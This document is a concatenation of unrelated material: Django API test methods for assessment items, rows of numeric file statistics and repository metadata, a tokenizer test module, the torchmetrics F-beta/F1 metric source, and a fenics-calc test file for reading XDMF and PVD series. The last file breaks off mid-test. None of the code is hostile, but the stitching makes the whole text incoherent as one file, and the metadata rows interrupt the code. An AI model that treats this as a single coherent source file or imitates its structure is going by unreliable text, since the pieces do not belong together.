    def test_update_assessmentitem_with_file_no_permissions(self):
        """A PATCH referencing a file the user does not own is rejected."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        image_file = testdata.fileobj_exercise_image()
        # Deliberately NOT owned by self.user.
        question = self._exercise_image_markdown(image_file)
        self.client.force_authenticate(user=self.user)
        response = self.client.patch(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
            {"question": question},
            format="json",
        )
        self.assertEqual(response.status_code, 400, response.content)
        try:
            file = assessmentitem.files.get()
            self.assertNotEqual(file.id, image_file.id)
            self.fail("File was updated")
        except models.File.DoesNotExist:
            pass

    def test_update_assessmentitem_remove_file(self):
        """Replacing the question with plain text detaches the previous file."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        image_file = testdata.fileobj_exercise_image()
        image_file.assessment_item = assessmentitem
        image_file.save()
        question = "A different question"
        self.client.force_authenticate(user=self.user)
        response = self.client.patch(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
            {"question": question},
            format="json",
        )
        self.assertEqual(response.status_code, 200, response.content)
        try:
            assessmentitem.files.get()
            self.fail("File was not removed")
        except models.File.DoesNotExist:
            pass

    def test_delete_assessmentitem(self):
        """DELETE to the detail endpoint removes the item."""
        assessmentitem = models.AssessmentItem.objects.create(
            **self.assessmentitem_db_metadata
        )
        self.client.force_authenticate(user=self.user)
        response = self.client.delete(
            reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id})
        )
        self.assertEqual(response.status_code, 204, response.content)
        try:
            models.AssessmentItem.objects.get(id=assessmentitem.id)
            self.fail("AssessmentItem was not deleted")
        except models.AssessmentItem.DoesNotExist:
            pass
| 36.381649
| 87
| 0.596148
| 2,462
| 27,359
| 6.416734
| 0.057271
| 0.033042
| 0.061527
| 0.046145
| 0.929991
| 0.923345
| 0.915432
| 0.897012
| 0.865173
| 0.851563
| 0
| 0.006257
| 0.31072
| 27,359
| 751
| 88
| 36.430093
| 0.831477
| 0
| 0
| 0.759232
| 0
| 0
| 0.068387
| 0.013414
| 0
| 0
| 0
| 0
| 0.062038
| 1
| 0.050222
| false
| 0.014771
| 0.017725
| 0.007386
| 0.078287
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a2d417664817bfb617d77d582b6df55946e2bfc
| 3,956
|
py
|
Python
|
tests/extra/test_wrapper_tokenizers.py
|
PRHLT/multimodal_keras_wrapper
|
0a088f36e5d4251ce465974f07d1a7f21b80203e
|
[
"MIT"
] | 7
|
2018-04-08T03:06:24.000Z
|
2019-04-24T07:56:38.000Z
|
tests/extra/test_wrapper_tokenizers.py
|
PRHLT/multimodal_keras_wrapper
|
0a088f36e5d4251ce465974f07d1a7f21b80203e
|
[
"MIT"
] | null | null | null |
tests/extra/test_wrapper_tokenizers.py
|
PRHLT/multimodal_keras_wrapper
|
0a088f36e5d4251ce465974f07d1a7f21b80203e
|
[
"MIT"
] | 7
|
2017-12-04T09:06:35.000Z
|
2021-04-19T07:47:46.000Z
|
# -*- coding: utf-8 -*-
import pytest
from keras_wrapper.extra.tokenizers import *
def test_tokenize_basic():
    """tokenize_basic splits punctuation into standalone tokens; lowercase flag works."""
    raw = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
    want = u'This , ¿ is a , . sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 , ! ! ! '
    assert tokenize_basic(raw, lowercase=False) == want
    assert tokenize_basic(raw, lowercase=True) == want.lower()
def test_tokenize_aggressive():
    """tokenize_aggressive strips punctuation entirely; lowercase flag works."""
    raw = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
    want = u'This is a sentence with weird\xbb symbols ù ä ë ï ö ü ^首先'
    assert tokenize_aggressive(raw, lowercase=False) == want
    assert tokenize_aggressive(raw, lowercase=True) == want.lower()
def test_tokenize_icann():
    """tokenize_icann lowercases its output and collapses repeated punctuation."""
    raw = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
    want = u'This , ¿is a , . sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 , ! '
    assert tokenize_icann(raw) == want.lower()
def test_tokenize_montreal():
    """tokenize_montreal lowercases and drops commas/periods but keeps '!'."""
    raw = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
    want = u'This ¿is a sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 !!!'
    assert tokenize_montreal(raw) == want.lower()
def test_tokenize_soft():
    """tokenize_soft separates most punctuation; lowercase flag works."""
    raw = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
    want = u'This , ¿is a , . sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 , ! '
    assert tokenize_soft(raw, lowercase=False) == want
    assert tokenize_soft(raw, lowercase=True) == want.lower()
def test_tokenize_none():
    """tokenize_none leaves the text intact apart from the trailing newlines."""
    raw = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
    want = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!'
    assert tokenize_none(raw) == want
def test_tokenize_none_char():
    """tokenize_none_char yields one token per character, spaces as '<space>'."""
    raw = u'This, ¿is a > < , .sentence with weird\xbb symbols'
    want = u'T h i s , <space> ¿ i s <space> a <space> > <space> < <space> , <space> . s e n t e n c e <space> w i t h <space> w e i r d \xbb <space> s y m b o l s'
    assert tokenize_none_char(raw) == want
def test_tokenize_CNN_sentence():
    # TODO: add coverage for tokenize_CNN_sentence (no reference output yet).
    pass
def test_tokenize_questions():
    # TODO: add coverage for tokenize_questions (no reference output yet).
    pass
def test_tokenize_bpe():
    # TODO: add coverage for tokenize_bpe (no reference output yet).
    pass
def test_detokenize_none():
    """detokenize_none returns its input unchanged."""
    tokens = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!'
    assert detokenize_none(tokens) == u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!'
def test_detokenize_none_char():
    """detokenize_none_char re-joins char tokens and maps '<space>' back to ' '."""
    tokens = u'T h i s , <space> ¿ i s <space> a <space> > <space> < <space> , <space> . s e n t e n c e <space> w i t h <space> w e i r d \xbb <space> s y m b o l s'
    want = u'This, ¿is a > < , .sentence with weird\xbb symbols'
    assert detokenize_none_char(tokens) == want
# Allow running this test module directly (outside a pytest invocation).
if __name__ == '__main__':
    pytest.main([__file__])
| 43
| 176
| 0.697169
| 626
| 3,956
| 4.22524
| 0.116613
| 0.136106
| 0.066541
| 0.090737
| 0.890359
| 0.832514
| 0.832514
| 0.793195
| 0.726276
| 0.726276
| 0
| 0.000316
| 0.201213
| 3,956
| 91
| 177
| 43.472527
| 0.831329
| 0.0091
| 0
| 0.42623
| 0
| 0.229508
| 0.36143
| 0
| 0
| 0
| 0
| 0.010989
| 0.196721
| 1
| 0.196721
| false
| 0.04918
| 0.032787
| 0
| 0.229508
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a716964453717bb3fb160fc73d7a5fd715943b1
| 16,950
|
py
|
Python
|
torchmetrics/classification/f_beta.py
|
radandreicristian/metrics
|
8048c77229f47d82d1adc391407f9cd2f5a8e9fa
|
[
"Apache-2.0"
] | 2
|
2022-01-20T12:33:18.000Z
|
2022-03-25T04:30:02.000Z
|
torchmetrics/classification/f_beta.py
|
radandreicristian/metrics
|
8048c77229f47d82d1adc391407f9cd2f5a8e9fa
|
[
"Apache-2.0"
] | null | null | null |
torchmetrics/classification/f_beta.py
|
radandreicristian/metrics
|
8048c77229f47d82d1adc391407f9cd2f5a8e9fa
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, Optional
import torch
from deprecate import deprecated, void
from torch import Tensor
from torchmetrics.classification.stat_scores import StatScores
from torchmetrics.functional.classification.f_beta import _fbeta_compute
from torchmetrics.utilities import _future_warning
from torchmetrics.utilities.enums import AverageMethod
class FBetaScore(StatScores):
    r"""
    Computes `F-score`_, specifically:

    .. math::
        F_\beta = (1 + \beta^2) * \frac{\text{precision} * \text{recall}}
        {(\beta^2 * \text{precision}) + \text{recall}}

    Where :math:`\beta` is some positive real factor. Works with binary, multiclass, and multilabel data.
    Accepts logit scores or probabilities from a model output or integer class values in prediction.
    Works with multi-dimensional preds and target.

    Forward accepts

    - ``preds`` (float or long tensor): ``(N, ...)`` or ``(N, C, ...)`` where C is the number of classes
    - ``target`` (long tensor): ``(N, ...)``

    If preds and target are the same shape and preds is a float tensor, we use the ``self.threshold`` argument
    to convert into integer labels. This is the case for binary and multi-label logits and probabilities.

    If preds has an extra dimension as in the case of multi-class scores we perform an argmax on ``dim=1``.

    Args:
        num_classes:
            Number of classes. Necessary for ``'macro'``, ``'weighted'`` and ``None`` average methods.
        beta:
            Beta coefficient in the F measure.
        threshold:
            Threshold for transforming probability or logit predictions to binary (0,1) predictions, in the case
            of binary or multi-label inputs. Default value of 0.5 corresponds to input being probabilities.
        average:
            Defines the reduction that is applied. Should be one of the following:

            - ``'micro'`` [default]: Calculate the metric globally, across all samples and classes.
            - ``'macro'``: Calculate the metric for each class separately, and average the
              metrics across classes (with equal weights for each class).
            - ``'weighted'``: Calculate the metric for each class separately, and average the
              metrics across classes, weighting each class by its support (``tp + fn``).
            - ``'none'`` or ``None``: Calculate the metric for each class separately, and return
              the metric for every class.
            - ``'samples'``: Calculate the metric for each sample, and average the metrics
              across samples (with equal weights for each sample).

            .. note:: What is considered a sample in the multi-dimensional multi-class case
                depends on the value of ``mdmc_average``.

            .. note:: If ``'none'`` and a given class doesn't occur in the `preds` or `target`,
                the value for the class will be ``nan``.

        mdmc_average:
            Defines how averaging is done for multi-dimensional multi-class inputs (on top of the
            ``average`` parameter). Should be one of the following:

            - ``None`` [default]: Should be left unchanged if your data is not multi-dimensional
              multi-class.
            - ``'samplewise'``: In this case, the statistics are computed separately for each
              sample on the ``N`` axis, and then averaged over samples.
              The computation for each sample is done by treating the flattened extra axes ``...``
              (see :ref:`references/modules:input types`) as the ``N`` dimension within the sample,
              and computing the metric for the sample based on that.
            - ``'global'``: In this case the ``N`` and ``...`` dimensions of the inputs
              (see :ref:`references/modules:input types`)
              are flattened into a new ``N_X`` sample axis, i.e. the inputs are treated as if they
              were ``(N_X, C)``. From here on the ``average`` parameter applies as usual.

        ignore_index:
            Integer specifying a target class to ignore. If given, this class index does not contribute
            to the returned score, regardless of reduction method. If an index is ignored, and ``average=None``
            or ``'none'``, the score for the ignored class will be returned as ``nan``.
        top_k:
            Number of highest probability or logit score predictions considered to find the correct label,
            relevant only for (multi-dimensional) multi-class inputs. The
            default value (``None``) will be interpreted as 1 for these inputs.
            Should be left at default (``None``) for all other types of inputs.
        multiclass:
            Used only in certain special cases, where you want to treat inputs as a different type
            than what they appear to be. See the parameter's
            :ref:`documentation section <references/modules:using the multiclass parameter>`
            for a more detailed explanation and examples.
        compute_on_step:
            Forward only calls ``update()`` and return ``None`` if this is set to ``False``.
        dist_sync_on_step:
            Synchronize metric state across processes at each ``forward()``
            before returning the value at the step
        process_group:
            Specify the process group on which synchronization is called.
            default: ``None`` (which selects the entire world)
        dist_sync_fn:
            Callback that performs the allgather operation on the metric state. When ``None``, DDP
            will be used to perform the allgather.

    Raises:
        ValueError:
            If ``average`` is none of ``"micro"``, ``"macro"``, ``"weighted"``, ``"none"``, ``None``.

    Example:
        >>> from torchmetrics import FBetaScore
        >>> target = torch.tensor([0, 1, 2, 0, 1, 2])
        >>> preds = torch.tensor([0, 2, 1, 0, 0, 1])
        >>> f_beta = FBetaScore(num_classes=3, beta=0.5)
        >>> f_beta(preds, target)
        tensor(0.3333)
    """

    def __init__(
        self,
        num_classes: Optional[int] = None,
        beta: float = 1.0,
        threshold: float = 0.5,
        average: str = "micro",
        mdmc_average: Optional[str] = None,
        ignore_index: Optional[int] = None,
        top_k: Optional[int] = None,
        multiclass: Optional[bool] = None,
        compute_on_step: bool = True,
        dist_sync_on_step: bool = False,
        process_group: Optional[Any] = None,
        # Fixed annotation: default is ``None``, so the type must be Optional.
        dist_sync_fn: Optional[Callable] = None,
    ) -> None:
        self.beta = beta
        allowed_average = list(AverageMethod)
        if average not in allowed_average:
            raise ValueError(f"The `average` has to be one of {allowed_average}, got {average}.")

        # ``'weighted'`` and ``'none'`` need per-class statistics, so both map onto a
        # ``'macro'`` reduce here; the final averaging is applied in ``compute``.
        super().__init__(
            reduce="macro" if average in [AverageMethod.WEIGHTED, AverageMethod.NONE] else average,
            mdmc_reduce=mdmc_average,
            threshold=threshold,
            top_k=top_k,
            num_classes=num_classes,
            multiclass=multiclass,
            ignore_index=ignore_index,
            compute_on_step=compute_on_step,
            dist_sync_on_step=dist_sync_on_step,
            process_group=process_group,
            dist_sync_fn=dist_sync_fn,
        )
        self.average = average

    def compute(self) -> Tensor:
        """Computes fbeta over state."""
        # Final tp/fp/tn/fn counts are accumulated by the StatScores base class.
        tp, fp, tn, fn = self._get_final_stats()
        return _fbeta_compute(tp, fp, tn, fn, self.beta, self.ignore_index, self.average, self.mdmc_reduce)
class FBeta(FBetaScore):
    r"""
    Computes `F-score`_, specifically:

    .. deprecated:: v0.7
        Use :class:`torchmetrics.FBetaScore`. Will be removed in v0.8.

    Example::

        >>> f_beta = FBetaScore(num_classes=3, beta=0.5)
        >>> f_beta(torch.tensor([0, 2, 1, 0, 0, 1]), torch.tensor([0, 1, 2, 0, 1, 2]))
        tensor(0.3333)
    """

    @deprecated(target=FBetaScore, deprecated_in="0.7", remove_in="0.8", stream=_future_warning)
    def __init__(
        self,
        num_classes: Optional[int] = None,
        beta: float = 1.0,
        threshold: float = 0.5,
        average: str = "micro",
        mdmc_average: Optional[str] = None,
        ignore_index: Optional[int] = None,
        top_k: Optional[int] = None,
        multiclass: Optional[bool] = None,
        compute_on_step: bool = True,
        dist_sync_on_step: bool = False,
        process_group: Optional[Any] = None,
        # Fixed annotation: default is ``None``, so the type must be Optional.
        dist_sync_fn: Optional[Callable] = None,
    ) -> None:
        # ``void`` only marks the arguments as used; the ``@deprecated`` decorator
        # redirects construction to :class:`FBetaScore` after emitting a warning.
        void(
            num_classes,
            beta,
            threshold,
            average,
            mdmc_average,
            ignore_index,
            top_k,
            multiclass,
            compute_on_step,
            dist_sync_on_step,
            process_group,
            dist_sync_fn,
        )
class F1Score(FBetaScore):
    """Computes F1 metric. F1 metrics correspond to a harmonic mean of the precision and recall scores.

    Works with binary, multiclass, and multilabel data. Accepts logits or probabilities from a model
    output or integer class values in prediction. Works with multi-dimensional preds and target.

    Forward accepts

    - ``preds`` (float or long tensor): ``(N, ...)`` or ``(N, C, ...)`` where C is the number of classes
    - ``target`` (long tensor): ``(N, ...)``

    If preds and target are the same shape and preds is a float tensor, we use the ``self.threshold`` argument.
    This is the case for binary and multi-label logits.

    If preds has an extra dimension as in the case of multi-class scores we perform an argmax on ``dim=1``.

    Args:
        num_classes:
            Number of classes. Necessary for ``'macro'``, ``'weighted'`` and ``None`` average methods.
        threshold:
            Threshold for transforming probability or logit predictions to binary (0,1) predictions, in the case
            of binary or multi-label inputs. Default value of 0.5 corresponds to input being probabilities.
        average:
            Defines the reduction that is applied. Should be one of the following:

            - ``'micro'`` [default]: Calculate the metric globally, across all samples and classes.
            - ``'macro'``: Calculate the metric for each class separately, and average the
              metrics across classes (with equal weights for each class).
            - ``'weighted'``: Calculate the metric for each class separately, and average the
              metrics across classes, weighting each class by its support (``tp + fn``).
            - ``'none'`` or ``None``: Calculate the metric for each class separately, and return
              the metric for every class.
            - ``'samples'``: Calculate the metric for each sample, and average the metrics
              across samples (with equal weights for each sample).

            .. note:: What is considered a sample in the multi-dimensional multi-class case
                depends on the value of ``mdmc_average``.

        mdmc_average:
            Defines how averaging is done for multi-dimensional multi-class inputs (on top of the
            ``average`` parameter). Should be one of the following:

            - ``None`` [default]: Should be left unchanged if your data is not multi-dimensional
              multi-class.
            - ``'samplewise'``: In this case, the statistics are computed separately for each
              sample on the ``N`` axis, and then averaged over samples.
              The computation for each sample is done by treating the flattened extra axes ``...``
              (see :ref:`references/modules:input types`) as the ``N`` dimension within the sample,
              and computing the metric for the sample based on that.
            - ``'global'``: In this case the ``N`` and ``...`` dimensions of the inputs
              (see :ref:`references/modules:input types`)
              are flattened into a new ``N_X`` sample axis, i.e. the inputs are treated as if they
              were ``(N_X, C)``. From here on the ``average`` parameter applies as usual.

        ignore_index:
            Integer specifying a target class to ignore. If given, this class index does not contribute
            to the returned score, regardless of reduction method. If an index is ignored, and ``average=None``
            or ``'none'``, the score for the ignored class will be returned as ``nan``.
        top_k:
            Number of highest probability or logit score predictions considered to find the correct label,
            relevant only for (multi-dimensional) multi-class inputs. The
            default value (``None``) will be interpreted as 1 for these inputs.
            Should be left at default (``None``) for all other types of inputs.
        multiclass:
            Used only in certain special cases, where you want to treat inputs as a different type
            than what they appear to be. See the parameter's
            :ref:`documentation section <references/modules:using the multiclass parameter>`
            for a more detailed explanation and examples.
        compute_on_step:
            Forward only calls ``update()`` and return ``None`` if this is set to ``False``.
        dist_sync_on_step:
            Synchronize metric state across processes at each ``forward()``
            before returning the value at the step
        process_group:
            Specify the process group on which synchronization is called.
            default: ``None`` (which selects the entire world)
        dist_sync_fn:
            Callback that performs the allgather operation on the metric state. When ``None``, DDP
            will be used to perform the allgather.

    Example:
        >>> from torchmetrics import F1Score
        >>> target = torch.tensor([0, 1, 2, 0, 1, 2])
        >>> preds = torch.tensor([0, 2, 1, 0, 0, 1])
        >>> f1 = F1Score(num_classes=3)
        >>> f1(preds, target)
        tensor(0.3333)
    """

    is_differentiable = False
    higher_is_better = True

    def __init__(
        self,
        num_classes: Optional[int] = None,
        threshold: float = 0.5,
        average: str = "micro",
        mdmc_average: Optional[str] = None,
        ignore_index: Optional[int] = None,
        top_k: Optional[int] = None,
        multiclass: Optional[bool] = None,
        compute_on_step: bool = True,
        dist_sync_on_step: bool = False,
        process_group: Optional[Any] = None,
        # Fixed annotation: default is ``None``, so the type must be Optional.
        dist_sync_fn: Optional[Callable] = None,
    ) -> None:
        # F1 is the special case of F-beta with beta fixed to 1 (equal weight on
        # precision and recall), so delegate everything to FBetaScore.
        super().__init__(
            num_classes=num_classes,
            beta=1.0,
            threshold=threshold,
            average=average,
            mdmc_average=mdmc_average,
            ignore_index=ignore_index,
            top_k=top_k,
            multiclass=multiclass,
            compute_on_step=compute_on_step,
            dist_sync_on_step=dist_sync_on_step,
            process_group=process_group,
            dist_sync_fn=dist_sync_fn,
        )
class F1(F1Score):
    """Computes F1 metric. F1 metrics correspond to a harmonic mean of the precision and recall scores.

    .. deprecated:: v0.7
        Use :class:`torchmetrics.F1Score`. Will be removed in v0.8.

    Example:
        >>> from torchmetrics import F1
        >>> target = torch.tensor([0, 1, 2, 0, 1, 2])
        >>> preds = torch.tensor([0, 2, 1, 0, 0, 1])
        >>> f1 = F1(num_classes=3)
        >>> f1(preds, target)
        tensor(0.3333)
    """

    @deprecated(target=F1Score, deprecated_in="0.7", remove_in="0.8", stream=_future_warning)
    def __init__(
        self,
        num_classes: Optional[int] = None,
        threshold: float = 0.5,
        average: str = "micro",
        mdmc_average: Optional[str] = None,
        ignore_index: Optional[int] = None,
        top_k: Optional[int] = None,
        multiclass: Optional[bool] = None,
        compute_on_step: bool = True,
        dist_sync_on_step: bool = False,
        process_group: Optional[Any] = None,
        # Fixed annotation: default is ``None``, so the type must be Optional.
        dist_sync_fn: Optional[Callable] = None,
    ) -> None:
        # ``void`` only marks the arguments as used; the ``@deprecated`` decorator
        # redirects construction to :class:`F1Score` after emitting a warning.
        void(
            num_classes,
            threshold,
            average,
            mdmc_average,
            ignore_index,
            top_k,
            multiclass,
            compute_on_step,
            dist_sync_on_step,
            process_group,
            dist_sync_fn,
        )
| 42.911392
| 112
| 0.618761
| 2,170
| 16,950
| 4.735484
| 0.159447
| 0.014013
| 0.014013
| 0.016349
| 0.812086
| 0.795348
| 0.788926
| 0.78406
| 0.771214
| 0.764402
| 0
| 0.011763
| 0.287788
| 16,950
| 394
| 113
| 43.020305
| 0.839463
| 0.67174
| 0
| 0.73913
| 0
| 0
| 0.021011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036232
| false
| 0
| 0.057971
| 0
| 0.144928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a63c2ec1b6bd3acde87bb41a4a2691196aa904a
| 7,003
|
py
|
Python
|
test/test_function_reading.py
|
jerabaul29/fenics-calc
|
74c2dc85bf0752fd4944eb37ef8e43b86fbd769e
|
[
"MIT"
] | null | null | null |
test/test_function_reading.py
|
jerabaul29/fenics-calc
|
74c2dc85bf0752fd4944eb37ef8e43b86fbd769e
|
[
"MIT"
] | 1
|
2020-05-14T12:50:32.000Z
|
2020-05-14T12:50:55.000Z
|
test/test_function_reading.py
|
thw1021/fenics-calc
|
383bd21b8fa4478c39b66947609882becf3c1c5a
|
[
"MIT"
] | 1
|
2020-05-13T01:09:19.000Z
|
2020-05-13T01:09:19.000Z
|
from xcalc.timeseries import XDMFTempSeries, PVDTempSeries
from xcalc.function_read import read_vtu_mesh, read_h5_mesh
from dolfin import *
import numpy as np
import unittest
def error(true, me):
    """Return the L2 norm of the difference between functions ``true`` and ``me``."""
    domain_mesh = me.function_space().mesh()
    diff = me - true
    return sqrt(abs(assemble(inner(diff, diff) * dx(domain=domain_mesh))))
class TestCases(unittest.TestCase):
    '''UnitTest for (some of) getting series from VTU/XDMF files'''

    # h5py is only needed for the XDMF/H5-based tests; probe for it once at class scope.
    try:
        import h5py
        has_h5py = True
    except ImportError:
        has_h5py = False

    @unittest.skipIf(not has_h5py, 'missing h5py')
    def test_xdmf_scalar(self):
        mesh = UnitSquareMesh(3, 3)
        V = FunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression('x[0]', degree=1), V)
        f1 = interpolate(Expression('x[1]', degree=1), V)

        with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
            f0.rename('f', '0')
            out.write(f0, 0.)
            f1.rename('f', '0')
            out.write(f1, 1.)

        series = XDMFTempSeries('xdmf_test.xdmf', V)
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    @unittest.skipIf(not has_h5py, 'missing h5py')
    def test_xdmf_vector(self):
        mesh = UnitSquareMesh(3, 3)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression(('x[0]', 'x[1]'), degree=1), V)
        f1 = interpolate(Expression(('2*x[0]', '-3*x[1]'), degree=1), V)

        with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
            f0.rename('f', '0')
            out.write(f0, 0.)
            f1.rename('f', '0')
            out.write(f1, 1.)

        series = XDMFTempSeries('xdmf_test.xdmf', V)
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    @unittest.skipIf(not has_h5py, 'missing h5py')
    def test_xdmf_tensor(self):
        mesh = UnitSquareMesh(3, 3)
        V = TensorFunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression((('x[0]', 'x[1]'), ('x[0]', '-x[1]')), degree=1), V)
        f1 = interpolate(Expression((('2*x[0]', '-3*x[1]'), ('4*x[0]', '-3*x[1]')), degree=1), V)

        with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
            f0.rename('f', '0')
            out.write(f0, 0.)
            f1.rename('f', '0')
            out.write(f1, 1.)

        series = XDMFTempSeries('xdmf_test.xdmf', V)
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    @unittest.skipIf(not has_h5py, 'missing h5py')
    def test_xdmf_scalar_restored(self):
        # NOTE(review): this test was previously also named ``test_xdmf_scalar``,
        # which silently shadowed the test above and asserted nothing. It is
        # renamed here (mirroring ``test_vtu_scalar_restored``) and given the
        # missing checks.
        mesh = UnitSquareMesh(3, 3)
        V = FunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression('x[0]', degree=1), V)
        f1 = interpolate(Expression('x[1]', degree=1), V)

        with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
            f0.rename('f', '0')
            out.write(f0, 0.)
            f1.rename('f', '0')
            out.write(f1, 1.)

        # Reconstruct the function space from the element alone; the mesh is read back from file.
        series = XDMFTempSeries('xdmf_test.xdmf', V=V.ufl_element())
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    @unittest.skipIf(not has_h5py, 'missing h5py')
    def test_h5_mesh_restored(self):
        mesh = UnitSquareMesh(3, 3)
        V = FunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression('x[0]', degree=1), V)
        f1 = interpolate(Expression('x[1]', degree=1), V)

        with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
            f0.rename('f', '0')
            out.write(f0, 0.)
            f1.rename('f', '0')
            out.write(f1, 1.)

        mesh_ = read_h5_mesh('xdmf_test.h5', mesh.ufl_cell())
        # Use ``err`` rather than ``error`` to avoid shadowing the module-level helper.
        err = np.linalg.norm(mesh.coordinates() - mesh_.coordinates(), np.inf)
        self.assertTrue(err < 1E-14)

        err = np.linalg.norm(mesh.cells() - mesh_.cells(), np.inf)
        self.assertTrue(err < 1E-14)

    # ---

    def test_vtu_scalar(self):
        mesh = UnitSquareMesh(3, 3)
        V = FunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression('x[0]', degree=1), V)
        f1 = interpolate(Expression('x[1]', degree=1), V)

        out = File('pvd_test.pvd')
        f0.rename('f', '0')
        out << (f0, 0.)
        f1.rename('f', '0')
        out << (f1, 1.)

        series = PVDTempSeries('pvd_test.pvd', V)
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    def test_vtu_vector(self):
        mesh = UnitSquareMesh(3, 3)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression(('x[0]', 'x[1]'), degree=1), V)
        f1 = interpolate(Expression(('2*x[0]', '-3*x[1]'), degree=1), V)

        out = File('pvd_test.pvd')
        f0.rename('f', '0')
        out << (f0, 0.)
        f1.rename('f', '0')
        out << (f1, 1.)

        series = PVDTempSeries('pvd_test.pvd', V)
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    def test_vtu_tensor(self):
        mesh = UnitSquareMesh(3, 3)
        V = TensorFunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression((('x[0]', 'x[1]'), ('2*x[0]', '-3*x[1]')),
                                    degree=1), V)
        f1 = interpolate(Expression((('2*x[0]', '-3*x[1]'), ('x[0]', 'x[1]')),
                                    degree=1), V)

        out = File('pvd_test.pvd')
        f0.rename('f', '0')
        out << (f0, 0.)
        f1.rename('f', '0')
        out << (f1, 1.)

        series = PVDTempSeries('pvd_test.pvd', V)
        self.assertTrue(error(f0, series[0]) < 1E-14)
        self.assertTrue(error(f1, series[1]) < 1E-14)

    def test_vtu_mesh_recovery(self):
        mesh = UnitSquareMesh(5, 5)
        V = FunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression('x[0]', degree=1), V)
        f1 = interpolate(Expression('x[1]', degree=1), V)

        out = File('pvd_test.pvd')
        f0.rename('f', '0')
        out << (f0, 0.)

        mesh_ = read_vtu_mesh('pvd_test000000.vtu', mesh.ufl_cell())
        # Use ``err`` rather than ``error`` to avoid shadowing the module-level helper.
        err = np.linalg.norm(mesh.coordinates() - mesh_.coordinates(), np.inf)
        self.assertTrue(err < 1E-14)

        err = np.linalg.norm(mesh.cells() - mesh_.cells(), np.inf)
        self.assertTrue(err < 1E-14)

    def test_vtu_scalar_restored(self):
        mesh = UnitSquareMesh(3, 3)
        V = FunctionSpace(mesh, 'CG', 1)
        f0 = interpolate(Expression('x[0]', degree=1), V)
        f1 = interpolate(Expression('x[1]', degree=1), V)

        out = File('pvd_test.pvd')
        f0.rename('f', '0')
        out << (f0, 0.)
        f1.rename('f', '0')
        out << (f1, 1.)

        # Reconstruct the function space from the element alone; the mesh is read back from file.
        series = PVDTempSeries('pvd_test.pvd', V=V.ufl_element())
